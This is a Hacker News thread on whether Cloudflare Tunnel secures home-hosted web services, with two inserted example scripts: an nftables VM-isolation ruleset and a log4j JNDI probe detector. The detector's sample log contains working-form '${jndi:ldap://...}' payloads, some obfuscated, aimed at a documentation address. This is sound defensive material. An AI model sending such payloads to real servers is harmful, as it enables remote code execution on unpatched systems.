by qeternity 1587 days ago
> But what if you could host a web service with no ports exposed? Well, you can! Cloudflare Tunnel makes a persistent outbound connection (a tunnel!) between your server and Cloudflare's nearest datacenter. All the traffic to your domain flows through this outgoing tunnel and connects to your server through the protection of Cloudflare. This also has the benefit of being seamlessly encrypted, so you don't have to worry about a thing when it comes to the security of your web service.

Well, a port is exposed, it's just exposed on Cloudflare's reverse proxies. And I think this is probably a dramatic overstatement of the security that Cloudflare provides...


The point is that it's connected via NAT, so you don't have to worry about port scanners hitting your origin IP and seeing any info about your web server (potentially exposing it to DDOS), and it's overall easier when you don't have to touch your inbound firewall.
I understand that. That doesn't mean you don't have to worry about security.

Most stacks would crumble under a relatively small L7 ddos that Cloudflare would not likely mitigate.

Well, a decent hosting provider such as Hetzner provides that service to all their customers. https://www.hetzner.com/unternehmen/ddos-schutz

Been using them for many years, way better and cheaper than AWS.

https://www.cloudflare.com/plans/#overview

The WAF is $20/month and as far as I know you don't get it automatically for free by using Cloudflare Tunnel, though feel free to correct me. There was the case of them enabling mitigations for the log4j vulnerabilities for anyone on Cloudflare, but that was an exception.

Yes, WAF is one of the features you get if you're not on their free app service plan. I think having the option of simply upgrading and turning it on if it becomes necessary, makes the free offering quite attractive.

I haven't used CF in anger, so can't vouch for it more than that.

We are die hard Cloudflare customers, I am speaking from experience. They are phenomenal, but they aren’t magic.
What do you then mean by a "relatively small L7 ddos that Cloudflare would not likely mitigate"? It seems to me that their WAF would mitigate that and I can worry even less about threats.
Could an origin server run a port scanner through the tunnel and hide the origin of the scan?
Well sure the scan would appear to come from cloudflare. But it’d be pretty easy for cloudflare to then identify the tunnel user as the source of the scans.
Well their WAF and dos protection are pretty nice.

An easy secure setup would be to spin up a guest VM and isolate it in its own subnet.

Disable routing between your guest and the rest of your lan and you can sleep easy at night so long as your app doesn’t serve any crazy dynamic content.
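Added example, not from the thread or any of its posters: a host-side nftables ruleset that does what the comment above (and the "network isolated VM with a tunnel to a remote vps" mentioned further down) describes. The guest on its own bridge may open outbound connections to the internet, which is all an outbound tunnel needs, but cannot reach RFC1918/ULA addresses (the LAN and the router's management interface) or the host itself. Assumptions: a libvirt-style NAT bridge (default name "virbr1", passed as the first argument), dnsmasq on the host serving DHCP/DNS on that bridge, and a home network that lives entirely in private address space.

```shell
#!/bin/sh
# Added example: isolate a guest VM on bridge $1 so it can only talk outbound
# to the internet. Assumptions: libvirt-style NAT bridge, host-side dnsmasq
# for DHCP/DNS, LAN confined to RFC1918/link-local (v4) and ULA/link-local (v6).

guest_isolation_ruleset() {
    bridge="${1:-virbr1}"
    cat <<EOF
table inet guest_isolation {
    set lan_v4 {
        type ipv4_addr
        flags interval
        elements = { 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16 }
    }
    set lan_v6 {
        type ipv6_addr
        flags interval
        elements = { fc00::/7, fe80::/10 }
    }
    chain forward {
        type filter hook forward priority 0; policy drop;
        ct state established,related accept
        ct state invalid drop
        iifname "$bridge" ip daddr @lan_v4 drop comment "guest -> LAN/router blocked"
        iifname "$bridge" ip6 daddr @lan_v6 drop comment "guest -> LAN/router (v6) blocked"
        iifname "$bridge" accept comment "guest outbound only (tunnel to Cloudflare/VPS)"
    }
    chain input {
        type filter hook input priority 0; policy accept;
        iifname "$bridge" udp dport { 53, 67 } accept comment "dnsmasq on the bridge"
        iifname "$bridge" drop comment "guest may not talk to the host"
    }
}
EOF
}

# Install the ruleset atomically, replacing any previous copy of the table.
apply_guest_isolation() {
    bridge="${1:-virbr1}"
    if ! command -v nft >/dev/null 2>&1; then
        echo "nft not found" >&2
        return 1
    fi
    if nft list table inet guest_isolation >/dev/null 2>&1; then
        nft delete table inet guest_isolation
    fi
    guest_isolation_ruleset "$bridge" | nft -f -   # nft reads the ruleset from stdin
}

# "apply <bridge>" (as root) installs the rules; anything else just prints them.
if [ "${1:-}" = "apply" ]; then
    apply_guest_isolation "${2:-virbr1}"
else
    guest_isolation_ruleset "${1:-virbr1}"
fi
```

The forward chain's drop policy is what matters: return traffic is accepted by conntrack, new flows from the guest are accepted only when their destination is outside the private ranges, and nothing may initiate a connection toward the guest. Run `nft list table inet guest_isolation` after applying to confirm the table loaded, and from inside the guest verify that the router's address times out while an outbound HTTPS connection still succeeds.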

"Walking around covered in body armor and allowing the military to drive me to work in a tank" is nice protection but it's also very restrictive. I don't think the argument against this is so much that Cloudflare doesn't provide nice features as that those features are entirely unneeded for 99.99% of people hosting from home. The downsides of heavy protection are vastly increased complexity and dependence on a non-'dumb pipe' non-ISP corporation which kind of defeats the point of hosting from home.

You really can just host your webserver from home network and forward the port using your consumer grade router and consumer home connection most of the time and nothing bad happens. But this kind of tunneling would be great for when you have a bad ISP that blocks port 80 instead of just saying servers aren't allowed.

Lmao your response made me chuckle. You're entirely right! Probably nothing bad will happen. Especially if you partition your network like I mentioned in my OP.

I would get worried about somehow enabling access to defects in my router by opening some inbound ports. I realize that's a little paranoid...but recently I have been playing around with https://github.com/threat9/routersploit and routinely find defects in consumer routers.

Here's my other beef with cloudflare: Once I gotta pay 200+/mo for their security services or whatever, I could just rent out a private rack in a colocation and throw some old beefy lga-2011 xeon hosts. Now I don't need anything on my LAN exposed and I have dedicated IPs, physical security, and backup generators...etc.

> Here's my other beef with cloudflare: Once I gotta pay 200+/mo for their security services or whatever, I could just rent out a private rack in a colocation and throw some old beefy lga-2011 xeon hosts. Now I don't need anything on my LAN exposed and I have dedicated IPs, physical security, and backup generators...etc.

Yeah but now you need to source the hardware for the rack, make sure it stays up and there's no hardware failures, etc, etc. Even simpler is to grab a Linode dedicated box which comes with v4 and v6 IPs and you get all the benefits for only $30 / mo instead.

Second hand dual lga2011 machines are so cheap it’s amazing. Enterprise grade servers are mega reliable I think people overestimate the probability of hardware failure.

A $30 Linode box has like 2 vCPUs and maybe 4GB RAM.

Where I live I can get a 1U slot in a shared colo rack for $30-$60/mo. Buy a used dual Xeon blade for a few hundred bucks and now I have a setup with 20x the resources. But yeah I admit there’s a lot more manual effort involved.

IMO if you can get a 1U for those prices, it's silly not to take it. Where I'm at I can't though and that's where a dedicated Linode box may make more sense.
You don't have to enable port forwarding to get your router exploited. I'd argue that port forwarding has neither positive nor negative effect on your router's security.

I've been hosting from home for 20+ years and I've never been troubled. But I only run static websites.

Yeah like I said I realize I am being paranoid but there are far fetched scenarios where serving static sites from home could compromise my home network.

Take the recent log4j vulnerabilities. Serving static content and logging trivial fields like request headers would lead to RCE. If that box can route to my home router, and my router has a defect available through routersploit, my network is completely pwned.

A network isolated VM with a tunnel to a remote vps would stop that particular attack.

All that being said…if a sophisticated adversary is targeting me I have to concede there are much easier routes to take.

I’m a security engineer at my day job so I may have conditioned myself into excessive fear.
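Added example, not from the thread or any of its posters, for the log4j scenario in the comment above (a static site that logs request headers). It flags JNDI lookup probes in web-server access logs: the plain "${jndi:" form, nested-lookup obfuscation such as "${${lower:j}ndi:" or "${j${::-n}di:", and the URL-encoded "%24%7Bjndi" form. The access-log lines are constructed samples in nginx combined format using documentation addresses (203.0.113.0/24), not real traffic; the regex is my own and is deliberately broad (a "${" followed within eight characters by "jndi" or another "${"), so review hits rather than acting on them automatically.

```shell
#!/bin/sh
# Added example: flag log4j-style JNDI lookup probes in access logs.
# The sample log below is constructed for this example, not real traffic.

# "${" (or its URL encoding) followed within 8 chars by "jndi" or another "${".
# Legitimate User-Agents and query strings essentially never contain "${".
JNDI_PATTERN='([$][{]|%24%7b)[^}]{0,8}(jndi|[$][{]|%24%7b)'

SAMPLE_LOG='203.0.113.7 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.8 - - [11/Dec/2021:03:14:08 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:ldap://203.0.113.9:1389/a}"
203.0.113.10 - - [11/Dec/2021:03:14:10 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 612 "-" "curl/7.68.0"
203.0.113.11 - - [11/Dec/2021:03:14:11 +0000] "GET /?q=${HOME} HTTP/1.1" 200 612 "-" "curl/7.68.0"
203.0.113.12 - - [11/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 612 "${j${::-n}di:rmi://203.0.113.9/a}" "curl/7.68.0"'

# Print every line on stdin that carries a JNDI probe (case-insensitive).
flag_jndi_probes() {
    grep -Ei "$JNDI_PATTERN"
}

# Count probing lines on stdin; prints 0 when there are none.
count_jndi_probes() {
    n=$(grep -Eic "$JNDI_PATTERN" || true)
    printf '%s\n' "${n:-0}"
}

# Unique source addresses (first field of the combined log format) that probed.
jndi_probe_sources() {
    flag_jndi_probes | cut -d' ' -f1 | sort -u
}

# Helpers that run the detector over the constructed sample.
sample_hits() { printf '%s\n' "$SAMPLE_LOG" | count_jndi_probes; }
sample_source_count() { printf '%s\n' "$SAMPLE_LOG" | jndi_probe_sources | grep -c .; }

# Stand-alone run: show the flagged lines, then the offending sources.
printf '%s\n' "$SAMPLE_LOG" | flag_jndi_probes
printf '%s\n' "$SAMPLE_LOG" | jndi_probe_sources
```

Four of the six sample lines are flagged (the `${HOME}` line and the ordinary browser line are not). Against a real log, `flag_jndi_probes < /var/log/nginx/access.log` is enough; the pattern only sees what the web server wrote, so headers that are not logged (or are logged to a separate file) need to be checked the same way.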

A static webserver is just the webserver in my mind. If you use something like nginx you are only going to be surprised by a remote exploit about once every two decades. Yeah, if you use some sprawling set of 'apps' that use things like Log4j on top of your server you're exposing attack surfaces.
and the fact that all your data will flow through cloudflare and they decide how to use it.
No no, it's encrypted so you can just completely ignore the security of your web service.

* Broken auth? Doesn't matter, encrypted.

* IDOR? Encryption takes care of it!

* Blind SQL or something from the 90s? EEENNNNCCCRRYYPPPTTIIOOONN!

To be fair, this feature is part of Cloudflare's ZeroTrust offering, so you're meant to put a policy in front of it and forget it. This is great for getting extremely old legacy services that previously relied on VPN network trust onto an actual SSO provider instead.
They probably use military-grade hashes too. So you know it is very secure indeed.
> ... you can just completely ignore the security of your web service

Be wary of such absolute statements -- especially when it comes to security.

You are replying to a sarcastic comment that agrees with you.